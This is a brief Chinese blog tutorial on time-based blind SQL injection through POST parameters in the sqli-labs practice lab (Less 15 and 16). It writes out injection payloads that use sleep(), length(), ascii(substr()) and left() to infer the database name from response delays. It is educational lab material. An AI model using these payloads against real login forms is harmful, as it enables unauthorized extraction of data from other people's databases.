小课堂 -- 延时布尔盲注(Post)

简介: 小课堂 -- 延时布尔盲注(Post)

环境sqli-labs

 

less 15

1、首先我们抓包

image.png

 

2、测试注入

在 username 输入 1' or 1=1#

在 password 输入 任意

所以用单引号闭合

 

3、构造语句

uname=admin' and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Submit

如果数据库的长度大于等于8多停留5秒,如果小于8什么都不操作

image.png

uname=admin' and If(ascii(substr(database(),1,1))=115,sleep(1),sleep(5))#&passwd=11&submit=Submit

如果第一位是‘s’是多停留1秒,如果不是多停留5秒

uname=admin'and If(left(database(),1)='s',1,sleep(5))#&passwd=11&submit=Submit

 

less 16

闭合是双引号和小括号(")),其他都一样

 

禁止非法,后果自负

目录
相关文章
|
8月前
|
数据库
15、延时布尔盲注(Post)
15、延时布尔盲注(Post)
53 0
|
6月前
|
程序员
后端“timestamp“: “2024-03-20T17:59:01.892+00:00“, “stat,解决的方法,如果你要发get请求,你要添加GetMapping,不写明请求方式,会报错
后端“timestamp“: “2024-03-20T17:59:01.892+00:00“, “stat,解决的方法,如果你要发get请求,你要添加GetMapping,不写明请求方式,会报错
|
8月前
|
SQL 数据库
小课堂 -- 时间​​盲注和Bool盲注
小课堂 -- 时间​​盲注和Bool盲注
28 0
|
8月前
|
Go
小课堂 -- 报错注入(post)
小课堂 -- 报错注入(post)
27 0
|
8月前
|
XML JSON 前端开发
ajax中get和post的区别,datatype返回的数据类型有哪些?web开发中数据提交的几种方式,有什么区别。百度使用哪种方式?
ajax中get和post的区别,datatype返回的数据类型有哪些?web开发中数据提交的几种方式,有什么区别。百度使用哪种方式?
62 0
|
前端开发 JavaScript
【前端用法】前端JS获取视频时长的写法
【前端用法】前端JS获取视频时长的写法
199 0
|
NoSQL 关系型数据库 MySQL
MySQL时间盲注五种延时方法
MySQL时间盲注五种延时方法
506 0
|
存储 算法
【实测】大白话讲requests发送请求的不同参数类型(上)
【实测】大白话讲requests发送请求的不同参数类型(上)
|
XML JSON 前端开发
【实测】大白话讲requests发送请求的不同参数类型(下)
【实测】大白话讲requests发送请求的不同参数类型(下)
|
数据库
mybaits传入的时间参数与数据库实际插入的时间晚8个小时
mybaits传入的时间参数与数据库实际插入的时间晚8个小时
228 0
mybaits传入的时间参数与数据库实际插入的时间晚8个小时

热门文章

最新文章